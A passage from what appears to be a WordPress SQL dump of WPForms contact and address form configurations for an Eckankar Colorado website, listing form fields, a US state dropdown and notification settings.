16:15:27','{\"id\":7,\"field_id\":14,\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"text\",\"label\":\"Subject\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Street Address\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"Address Line 2\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"text\",\"label\":\"City\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"9\":{\"id\":\"9\",\"type\":\"select\",\"label\":\"State\",\"choices\":{\"1\":{\"default\":\"1\",\"label\":\"Select...\",\"value\":\"\"},\"5\":{\"label\":\"Alabama (AL)\",\"value\":\"AL\"},\"6\":{\"label\":\"Alaska (AK)\",\"value\":\"AK\"},\"7\":{\"label\":\"American Samoa (AS)\",\"value\":\"AS\"},\"8\":{\"label\":\"Arizona (AZ)\",\"value\":\"AZ\"},\"9\":{\"label\":\"Arkansas (AR)\",\"value\":\"AR\"},\"10\":{\"label\":\"California (CA)\",\"value\":\"CA\"},\"11\":{\"label\":\"Colorado (CO)\",\"value\":\"CO\"},\"12\":{\"label\":\"Connecticut (CT)\",\"value\":\"CT\"},\"13\":{\"label\":\"Delaware (DE)\",\"value\":\"DE\"},\"14\":{\"label\":\"Dist. of Columbia (DC)\",\"value\":\"DC\"},\"15\":{\"label\":\"Florida (FL)\",\"value\":\"FL\"},\"16\":{\"label\":\"Georgia (GA)\",\"value\":\"GA\"},\"17\":{\"label\":\"Guam (GU)\",\"value\":\"GU\"},\"18\":{\"label\":\"Hawaii (HI)\",\"value\":\"HI\"},\"19\":{\"label\":\"Idaho (ID)\",\"value\":\"ID\"},\"20\":{\"label\":\"Illinois (IL)\",\"value\":\"IL\"},\"21\":{\"label\":\"Indiana (IN)\",\"value\":\"IN\"},\"22\":{\"label\":\"Iowa (IA)\",\"value\":\"IA\"},\"23\":{\"label\":\"Kansas (KS)\",\"value\":\"KS\"},\"24\":{\"label\":\"Kentucky (KY)\",\"value\":\"KY\"},\"25\":{\"label\":\"Louisiana (LA)\",\"value\":\"LA\"},\"26\":{\"label\":\"Maine (ME)\",\"value\":\"ME\"},\"27\":{\"label\":\"Maryland (MD)\",\"value\":\"MD\"},\"28\":{\"label\":\"Marshall Islands (MH)\",\"value\":\"MH\"},\"29\":{\"label\":\"Massachusetts (MA)\",\"value\":\"MA\"},\"30\":{\"label\":\"Michigan (MI)\",\"value\":\"MI\"},\"31\":{\"label\":\"Micronesia (FM)\",\"value\":\"FM\"},\"32\":{\"label\":\"Minnesota (MN)\",\"value\":\"MN\"},\"33\":{\"label\":\"Mississippi (MS)\",\"value\":\"MS\"},\"34\":{\"label\":\"Missouri (MO)\",\"value\":\"MO\"},\"35\":{\"label\":\"Montana (MT)\",\"value\":\"MT\"},\"36\":{\"label\":\"Nebraska (NE)\",\"value\":\"NE\"},\"37\":{\"label\":\"Nevada (NV)\",\"value\":\"NV\"},\"38\":{\"label\":\"New Hampshire (NH)\",\"value\":\"NH\"},\"39\":{\"label\":\"New Jersey (NJ)\",\"value\":\"NJ\"},\"40\":{\"label\":\"New Mexico (NM)\",\"value\":\"NM\"},\"41\":{\"label\":\"New York (NY)\",\"value\":\"NY\"},\"42\":{\"label\":\"North Carolina (NC)\",\"value\":\"NC\"},\"43\":{\"label\":\"North Dakota (ND)\",\"value\":\"ND\"},\"44\":{\"label\":\"Northern Marianas (MP)\",\"value\":\"MP\"},\"45\":{\"label\":\"Ohio (OH)\",\"value\":\"OH\"},\"46\":{\"label\":\"Oklahoma (OK)\",\"value\":\"OK\"},\"47\":{\"label\":\"Oregon (OR)\",\"value\":\"OR\"},\"48\":{\"label\":\"Palau (PW)\",\"value\":\"PW\"},\"49\":{\"label\":\"Pennsylvania (PA)\",\"value\":\"PA\"},\"50\":{\"label\":\"Puerto Rico (PR)\",\"value\":\"PR\"},\"51\":{\"label\":\"Rhode Island (RI)\",\"value\":\"RI\"},\"52\":{\"label\":\"South Carolina (SC)\",\"value\":\"SC\"},\"53\":{\"label\":\"South Dakota (SD)\",\"value\":\"SD\"},\"54\":{\"label\":\"Tennessee (TN)\",\"value\":\"TN\"},\"55\":{\"label\":\"Texas (TX)\",\"value\":\"TX\"},\"56\":{\"label\":\"Utah (UT)\",\"value\":\"UT\"},\"57\":{\"label\":\"Vermont (VT)\",\"value\":\"VT\"},\"58\":{\"label\":\"Virginia (VA)\",\"value\":\"VA\"},\"59\":{\"label\":\"Virgin Islands (VI)\",\"value\":\"VI\"},\"60\":{\"label\":\"Washington (WA)\",\"value\":\"WA\"},\"61\":{\"label\":\"West Virginia (WV)\",\"value\":\"WV\"},\"62\":{\"label\":\"Wisconsin (WI)\",\"value\":\"WI\"},\"63\":{\"label\":\"Wyoming (WY)\",\"value\":\"WY\"},\"64\":{\"label\":\"Other\",\"value\":\"Other\"}},\"description\":\"\",\"show_values\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\",\"dynamic_choices\":\"\"},\"10\":{\"id\":\"10\",\"type\":\"text\",\"label\":\"ZIP / Postal Code\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"11\":{\"id\":\"11\",\"type\":\"text\",\"label\":\"Country\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"12\":{\"id\":\"12\",\"type\":\"text\",\"label\":\"Phone\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"13\":{\"id\":\"13\",\"type\":\"textarea\",\"label\":\"Message\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\"}},\"settings\":{\"form_title\":\"BoldGrid Form 2\",\"form_desc\":\"\",\"hide_title_desc\":\"1\",\"form_class\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"submit_class\":\"\",\"honeypot\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"Form 2 submission\",\"sender_name\":\"\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\"}},\"confirmation_type\":\"message\",\"confirmation_message\":\"<span id=u0022nf-drawer-contentu0022><span class=u0022nf-setting-groupsu0022><span class=u0022nf-field-settingsu0022>Thank you for getting in touch with us! We will try our best to respond back to you within 24 hours.</span></span></span>\",\"confirmation_message_scroll\":\"1\",\"confirmation_page\":\"72532\",\"confirmation_redirect\":\"\"},\"meta\":{\"template\":\"blank\"}}','BoldGrid Form 2','','publish','closed','closed','','boldgrid-form-2','','','2019-07-03 16:15:27','2019-07-03 16:15:27','',0,'https://eckankar-colorado.org/?post_type=wpforms&#038;p=7',0,'wpforms','',0),(8,2,'2019-07-03 16:15:27','2019-07-03 16:15:27','{\"id\":8,\"field_id\":17,\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"text\",\"label\":\"Subject\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Street Address\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"Address Line 2\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"text\",\"label\":\"City\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"9\":{\"id\":\"9\",\"type\":\"select\",\"label\":\"State\",\"choices\":{\"1\":{\"default\":\"1\",\"label\":\"Select...\",\"value\":\"\"},\"5\":{\"label\":\"Alabama (AL)\",\"value\":\"AL\"},\"6\":{\"label\":\"Alaska (AK)\",\"value\":\"AK\"},\"7\":{\"label\":\"American Samoa (AS)\",\"value\":\"AS\"},\"8\":{\"label\":\"Arizona (AZ)\",\"value\":\"AZ\"},\"9\":{\"label\":\"Arkansas (AR)\",\"value\":\"AR\"},\"10\":{\"label\":\"California (CA)\",\"value\":\"CA\"},\"11\":{\"label\":\"Colorado (CO)\",\"value\":\"CO\"},\"12\":{\"label\":\"Connecticut (CT)\",\"value\":\"CT\"},\"13\":{\"label\":\"Delaware (DE)\",\"value\":\"DE\"},\"14\":{\"label\":\"Dist. of Columbia (DC)\",\"value\":\"DC\"},\"15\":{\"label\":\"Florida (FL)\",\"value\":\"FL\"},\"16\":{\"label\":\"Georgia (GA)\",\"value\":\"GA\"},\"17\":{\"label\":\"Guam (GU)\",\"value\":\"GU\"},\"18\":{\"label\":\"Hawaii (HI)\",\"value\":\"HI\"},\"19\":{\"label\":\"Idaho (ID)\",\"value\":\"ID\"},\"20\":{\"label\":\"Illinois (IL)\",\"value\":\"IL\"},\"21\":{\"label\":\"Indiana (IN)\",\"value\":\"IN\"},\"22\":{\"label\":\"Iowa (IA)\",\"value\":\"IA\"},\"23\":{\"label\":\"Kansas (KS)\",\"value\":\"KS\"},\"24\":{\"label\":\"Kentucky (KY)\",\"value\":\"KY\"},\"25\":{\"label\":\"Louisiana (LA)\",\"value\":\"LA\"},\"26\":{\"label\":\"Maine (ME)\",\"value\":\"ME\"},\"27\":{\"label\":\"Maryland (MD)\",\"value\":\"MD\"},\"28\":{\"label\":\"Marshall Islands (MH)\",\"value\":\"MH\"},\"29\":{\"label\":\"Massachusetts (MA)\",\"value\":\"MA\"},\"30\":{\"label\":\"Michigan (MI)\",\"value\":\"MI\"},\"31\":{\"label\":\"Micronesia (FM)\",\"value\":\"FM\"},\"32\":{\"label\":\"Minnesota (MN)\",\"value\":\"MN\"},\"33\":{\"label\":\"Mississippi (MS)\",\"value\":\"MS\"},\"34\":{\"label\":\"Missouri (MO)\",\"value\":\"MO\"},\"35\":{\"label\":\"Montana (MT)\",\"value\":\"MT\"},\"36\":{\"label\":\"Nebraska (NE)\",\"value\":\"NE\"},\"37\":{\"label\":\"Nevada (NV)\",\"value\":\"NV\"},\"38\":{\"label\":\"New Hampshire (NH)\",\"value\":\"NH\"},\"39\":{\"label\":\"New Jersey (NJ)\",\"value\":\"NJ\"},\"40\":{\"label\":\"New Mexico (NM)\",\"value\":\"NM\"},\"41\":{\"label\":\"New York (NY)\",\"value\":\"NY\"},\"42\":{\"label\":\"North Carolina (NC)\",\"value\":\"NC\"},\"43\":{\"label\":\"North Dakota (ND)\",\"value\":\"ND\"},\"44\":{\"label\":\"Northern Marianas (MP)\",\"value\":\"MP\"},\"45\":{\"label\":\"Ohio (OH)\",\"value\":\"OH\"},\"46\":{\"label\":\"Oklahoma (OK)\",\"value\":\"OK\"},\"47\":{\"label\":\"Oregon (OR)\",\"value\":\"OR\"},\"48\":{\"label\":\"Palau (PW)\",\"value\":\"PW\"},\"49\":{\"label\":\"Pennsylvania (PA)\",\"value\":\"PA\"},\"50\":{\"label\":\"Puerto Rico (PR)\",\"value\":\"PR\"},\"51\":{\"label\":\"Rhode Island (RI)\",\"value\":\"RI\"},\"52\":{\"label\":\"South Carolina (SC)\",\"value\":\"SC\"},\"53\":{\"label\":\"South Dakota (SD)\",\"value\":\"SD\"},\"54\":{\"label\":\"Tennessee (TN)\",\"value\":\"TN\"},\"55\":{\"label\":\"Texas (TX)\",\"value\":\"TX\"},\"56\":{\"label\":\"Utah (UT)\",\"value\":\"UT\"},\"57\":{\"label\":\"Vermont (VT)\",\"value\":\"VT\"},\"58\":{\"label\":\"Virginia (VA)\",\"value\":\"VA\"},\"59\":{\"label\":\"Virgin Islands (VI)\",\"value\":\"VI\"},\"60\":{\"label\":\"Washington (WA)\",\"value\":\"WA\"},\"61\":{\"label\":\"West Virginia (WV)\",\"value\":\"WV\"},\"62\":{\"label\":\"Wisconsin (WI)\",\"value\":\"WI\"},\"63\":{\"label\":\"Wyoming (WY)\",\"value\":\"WY\"},\"64\":{\"label\":\"Other\",\"value\":\"Other\"}},\"description\":\"\",\"show_values\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\",\"dynamic_choices\":\"\"},\"10\":{\"id\":\"10\",\"type\":\"text\",\"label\":\"ZIP / Postal Code\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"11\":{\"id\":\"11\",\"type\":\"text\",\"label\":\"Country\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"12\":{\"id\":\"12\",\"type\":\"text\",\"label\":\"Phone\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"14\":{\"id\":\"14\",\"type\":\"text\",\"label\":\"Alternate Phone\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"15\":{\"id\":\"15\",\"type\":\"radio\",\"label\":\"When is the best time to contact you?\",\"choices\":{\"1\":{\"label\":\"Morning\",\"value\":\"Morning\"},\"2\":{\"label\":\"Afternoon\",\"value\":\"Afternoon\"},\"3\":{\"label\":\"Evening\",\"value\":\"Evening\"}},\"description\":\"\",\"show_values\":\"1\",\"input_columns\":\"\",\"css\":\"\",\"dynamic_choices\":\"\"},\"16\":{\"id\":\"16\",\"type\":\"radio\",\"label\":\"What is the best way to contact you?\",\"choices\":{\"1\":{\"label\":\"Phone\",\"value\":\"Phone\"},\"2\":{\"label\":\"Email\",\"value\":\"Email\"}},\"description\":\"\",\"show_values\":\"1\",\"input_columns\":\"\",\"css\":\"\",\"dynamic_choices\":\"\"},\"13\":{\"id\":\"13\",\"type\":\"textarea\",\"label\":\"Message\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\"}},\"settings\":{\"form_title\":\"BoldGrid Form 3\",\"form_desc\":\"\",\"hide_title_desc\":\"1\",\"form_class\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"submit_class\":\"\",\"honeypot\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"Form 3 submission\",\"sender_name\":\"\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\"}},\"confirmation_type\":\"message\",\"confirmation_message\":\"<span id=u0022nf-drawer-contentu0022><span class=u0022nf-setting-groupsu0022><span class=u0022nf-field-settingsu0022>Thank you for getting in touch with us! We will try our best to respond back to you within 24 hours.</span></span></span>\",\"confirmation_message_scroll\":\"1\",\"confirmation_page\":\"72532\",\"confirmation_redirect\":\"\"},\"meta\":{\"template\":\"blank\"}}','BoldGrid Form 3','','publish','closed','closed','','boldgrid-form-3','','','2019-07-03 16:15:27','2019-07-03 16:15:27','',0,'https://eckankar-colorado.org/?post_type=wpforms&#038;p=8',0,'wpforms','',0),(9,2,'2019-07-03 16:15:27','2019-07-03 16:15:27','{\"id\":9,\"field_id\":14,\"fields\":{\"2\":{\"id\":\"2\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Street Address\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"Address Line 2\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"text\",\"label\":\"City / Town\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"9\":{\"id\":\"9\",\"type\":\"select\",\"label\":\"State / Province\",\"choices\":{\"1\":{\"default\":\"1\",\"label\":\"Select...\",\"value\":\"\"},\"5\":{\"label\":\"Alabama (AL)\",\"value\":\"AL\"},\"6\":{\"label\":\"Alaska (AK)\",\"value\":\"AK\"},\"7\":{\"label\":\"American Samoa (AS)\",\"value\":\"AS\"},\"8\":{\"label\":\"Arizona (AZ)\",\"value\":\"AZ\"},\"9\":{\"label\":\"Arkansas (AR)\",\"value\":\"AR\"},\"10\":{\"label\":\"California (CA)\",\"value\":\"CA\"},\"11\":{\"label\":\"Colorado (CO)\",\"value\":\"CO\"},\"12\":{\"label\":\"Connecticut (CT)\",\"value\":\"CT\"},\"13\":{\"label\":\"Delaware (DE)\",\"value\":\"DE\"},\"14\":{\"label\":\"Dist. of Columbia (DC)\",\"value\":\"DC\"},\"15\":{\"label\":\"Florida (FL)\",\"value\":\"FL\"},\"16\":{\"label\":\"Georgia (GA)\",\"value\":\"GA\"},\"17\":{\"label\":\"Guam (GU)\",\"value\":\"GU\"},\"18\":{\"label\":\"Hawaii (HI)\",\"value\":\"HI\"},\"19\":{\"label\":\"Idaho (ID)\",\"value\":\"ID\"},\"20\":{\"label\":\"Illinois (IL)\",\"value\":\"IL\"},\"21\":{\"label\":\"Indiana (IN)\",\"value\":\"IN\"},\"22\":{\"label\":\"Iowa (IA)\",\"value\":\"IA\"},\"23\":{\"label\":\"Kansas (KS)\",\"value\":\"KS\"},\"24\":{\"label\":\"Kentucky (KY)\",\"value\":\"KY\"},\"25\":{\"label\":\"Louisiana (LA)\",\"value\":\"LA\"},\"26\":{\"label\":\"Maine (ME)\",\"value\":\"ME\"},\"27\":{\"label\":\"Maryland (MD)\",\"value\":\"MD\"},\"28\":{\"label\":\"Marshall Islands (MH)\",\"value\":\"MH\"},\"29\":{\"label\":\"Massachusetts (MA)\",\"value\":\"MA\"},\"30\":{\"label\":\"Michigan (MI)\",\"value\":\"MI\"},\"31\":{\"label\":\"Micronesia (FM)\",\"value\":\"FM\"},\"32\":{\"label\":\"Minnesota (MN)\",\"value\":\"MN\"},\"33\":{\"label\":\"Mississippi (MS)\",\"value\":\"MS\"},\"34\":{\"label\":\"Missouri (MO)\",\"value\":\"MO\"},\"35\":{\"label\":\"Montana (MT)\",\"value\":\"MT\"},\"36\":{\"label\":\"Nebraska (NE)\",\"value\":\"NE\"},\"37\":{\"label\":\"Nevada (NV)\",\"value\":\"NV\"},\"38\":{\"label\":\"New Hampshire (NH)\",\"value\":\"NH\"},\"39\":{\"label\":\"New Jersey (NJ)\",\"value\":\"NJ\"},\"40\":{\"label\":\"New Mexico (NM)\",\"value\":\"NM\"},\"41\":{\"label\":\"New York (NY)\",\"value\":\"NY\"},\"42\":{\"label\":\"North Carolina (NC)\",\"value\":\"NC\"},\"43\":{\"label\":\"North Dakota (ND)\",\"value\":\"ND\"},\"44\":{\"label\":\"Northern Marianas (MP)\",\"value\":\"MP\"},\"45\":{\"label\":\"Ohio (OH)\",\"value\":\"OH\"},\"46\":{\"label\":\"Oklahoma (OK)\",\"value\":\"OK\"},\"47\":{\"label\":\"Oregon (OR)\",\"value\":\"OR\"},\"48\":{\"label\":\"Palau (PW)\",\"value\":\"PW\"},\"49\":{\"label\":\"Pennsylvania (PA)\",\"value\":\"PA\"},\"50\":{\"label\":\"Puerto Rico (PR)\",\"value\":\"PR\"},\"51\":{\"label\":\"Rhode Island (RI)\",\"value\":\"RI\"},\"52\":{\"label\":\"South Carolina (SC)\",\"value\":\"SC\"},\"53\":{\"label\":\"South Dakota (SD)\",\"value\":\"SD\"},\"54\":{\"label\":\"Tennessee (TN)\",\"value\":\"TN\"},\"55\":{\"label\":\"Texas (TX)\",\"value\":\"TX\"},\"56\":{\"label\":\"Utah (UT)\",\"value\":\"UT\"},\"57\":{\"label\":\"Vermont (VT)\",\"value\":\"VT\"},\"58\":{\"label\":\"Virginia (VA)\",\"value\":\"VA\"},\"59\":{\"label\":\"Virgin Islands (VI)\",\"value\":\"VI\"},\"60\":{\"label\":\"Washington (WA)\",\"value\":\"WA\"},\"61\":{\"label\":\"West Virginia (WV)\",\"value\":\"WV\"},\"62\":{\"label\":\"Wisconsin (WI)\",\"value\":\"WI\"},\"63\":{\"label\":\"Wyoming (WY)\",\"value\":\"WY\"},\"64\":{\"label\":\"Other\",\"value\":\"Other\"}},\"description\":\"\",\"required\":\"1\",\"show_values\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\",\"dynamic_choices\":\"\"},\"10\":{\"id\":\"10\",\"type\":\"text\",\"label\":\"ZIP / Postal Code\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"11\":{\"id\":\"11\",\"type\":\"text\",\"label\":\"Country\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"}},\"settings\":{\"form_title\":\"Address Form (International)\",\"form_desc\":\"\",\"form_class\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"submit_class\":\"\",\"honeypot\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"Address Form (International) submission\",\"sender_name\":\"\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\"}},\"confirmation_type\":\"message\",\"confirmation_message\":\"<span id=u0022nf-drawer-contentu0022><span class=u0022nf-setting-groupsu0022><span class=u0022nf-field-settingsu0022>Thank you for getting in touch with us! We will try our best to respond back to you within 24 hours.</span></span></span>\",\"confirmation_message_scroll\":\"1\",\"confirmation_page\":\"72532\",\"confirmation_redirect\":\"\"},\"meta\":{\"template\":\"blank\"}}','Address Form (International)','','publish','closed','closed','','address-form-international','','','2019-07-03 16:15:27','2019-07-03 16:15:27','',0,'https://eckankar-colorado.org/?post_type=wpforms&#038;p=9',0,'wpforms','',0),(10,2,'2019-07-03 16:15:27','2019-07-03 16:15:27','{\"id\":10,\"field_id\":14,\"fields\":{\"2\":{\"id\":\"2\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Street Address\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"Address Line 2\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"text\",\"label\":\"City / Town\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"9\":{\"id\":\"9\",\"type\":\"select\",\"label\":\"State\",\"choices\":{\"1\":{\"default\":\"1\",\"label\":\"Select...\",\"value\":\"\"},\"5\":{\"label\":\"Alabama (AL)\",\"value\":\"AL\"},\"6\":{\"label\":\"Alaska (AK)\",\"value\":\"AK\"},\"7\":{\"label\":\"American Samoa (AS)\",\"value\":\"AS\"},\"8\":{\"label\":\"Arizona (AZ)\",\"value\":\"AZ\"},\"9\":{\"label\":\"Arkansas (AR)\",\"value\":\"AR\"},\"10\":{\"label\":\"California (CA)\",\"value\":\"CA\"},\"11\":{\"label\":\"Colorado (CO)\",\"value\":\"CO\"},\"12\":{\"label\":\"Connecticut (CT)\",\"value\":\"CT\"},\"13\":{\"label\":\"Delaware (DE)\",\"value\":\"DE\"},\"14\":{\"label\":\"Dist. of Columbia (DC)\",\"value\":\"DC\"},\"15\":{\"label\":\"Florida (FL)\",\"value\":\"FL\"},\"16\":{\"label\":\"Georgia (GA)\",\"value\":\"GA\"},\"17\":{\"label\":\"Guam (GU)\",\"value\":\"GU\"},\"18\":{\"label\":\"Hawaii (HI)\",\"value\":\"HI\"},\"19\":{\"label\":\"Idaho (ID)\",\"value\":\"ID\"},\"20\":{\"label\":\"Illinois (IL)\",\"value\":\"IL\"},\"21\":{\"label\":\"Indiana (IN)\",\"value\":\"IN\"},\"22\":{\"label\":\"Iowa (IA)\",\"value\":\"IA\"},\"23\":{\"label\":\"Kansas (KS)\",\"value\":\"KS\"},\"24\":{\"label\":\"Kentucky (KY)\",\"value\":\"KY\"},\"25\":{\"label\":\"Louisiana (LA)\",\"value\":\"LA\"},\"26\":{\"label\":\"Maine (ME)\",\"value\":\"ME\"},\"27\":{\"label\":\"Maryland (MD)\",\"value\":\"MD\"},\"28\":{\"label\":\"Marshall Islands (MH)\",\"value\":\"MH\"},\"29\":{\"label\":\"Massachusetts (MA)\",\"value\":\"MA\"},\"30\":{\"label\":\"Michigan (MI)\",\"value\":\"MI\"},\"31\":{\"label\":\"Micronesia (FM)\",\"value\":\"FM\"},\"32\":{\"label\":\"Minnesota (MN)\",\"value\":\"MN\"},\"33\":{\"label\":\"Mississippi (MS)\",\"value\":\"MS\"},\"34\":{\"label\":\"Missouri (MO)\",\"value\":\"MO\"},\"35\":{\"label\":\"Montana (MT)\",\"value\":\"MT\"},\"36\":{\"label\":\"Nebraska (NE)\",\"value\":\"NE\"},\"37\":{\"label\":\"Nevada (NV)\",\"value\":\"NV\"},\"38\":{\"label\":\"New Hampshire (NH)\",\"value\":\"NH\"},\"39\":{\"label\":\"New Jersey (NJ)\",\"value\":\"NJ\"},\"40\":{\"label\":\"New Mexico (NM)\",\"value\":\"NM\"},\"41\":{\"label\":\"New York (NY)\",\"value\":\"NY\"},\"42\":{\"label\":\"North Carolina (NC)\",\"value\":\"NC\"},\"43\":{\"label\":\"North Dakota (ND)\",\"value\":\"ND\"},\"44\":{\"label\":\"Northern Marianas (MP)\",\"value\":\"MP\"},\"45\":{\"label\":\"Ohio (OH)\",\"value\":\"OH\"},\"46\":{\"label\":\"Oklahoma (OK)\",\"value\":\"OK\"},\"47\":{\"label\":\"Oregon (OR)\",\"value\":\"OR\"},\"48\":{\"label\":\"Palau (PW)\",\"value\":\"PW\"},\"49\":{\"label\":\"Pennsylvania (PA)\",\"value\":\"PA\"},\"50\":{\"label\":\"Puerto Rico (PR)\",\"value\":\"PR\"},\"51\":{\"label\":\"Rhode Island (RI)\",\"value\":\"RI\"},\"52\":{\"label\":\"South Carolina (SC)\",\"value\":\"SC\"},\"53\":{\"label\":\"South Dakota (SD)\",\"value\":\"SD\"},\"54\":{\"label\":\"Tennessee (TN)\",\"value\":\"TN\"},\"55\":{\"label\":\"Texas (TX)\",\"value\":\"TX\"},\"56\":{\"label\":\"Utah (UT)\",\"value\":\"UT\"},\"57\":{\"label\":\"Vermont (VT)\",\"value\":\"VT\"},\"58\":{\"label\":\"Virginia (VA)\",\"value\":\"VA\"},\"59\":{\"label\":\"Virgin Islands (VI)\",\"value\":\"VI\"},\"60\":{\"label\":\"Washington (WA)\",\"value\":\"WA\"},\"61\":{\"label\":\"West Virginia (WV)\",\"value\":\"WV\"},\"62\":{\"label\":\"Wisconsin (WI)\",\"value\":\"WI\"},\"63\":{\"label\":\"Wyoming (WY)\",\"value\":\"WY\"},\"64\":{\"label\":\"Other\",\"value\":\"Other\"}},\"description\":\"\",\"required\":\"1\",\"show_values\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\",\"dynamic_choices\":\"\"},\"10\":{\"id\":\"10\",\"type\":\"text\",\"label\":\"ZIP / Postal Code\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"}},\"settings\":{\"form_title\":\"Address Form (US)\",\"form_desc\":\"\",\"form_class\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"submit_class\":\"\",\"honeypot\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"Address Form (US) 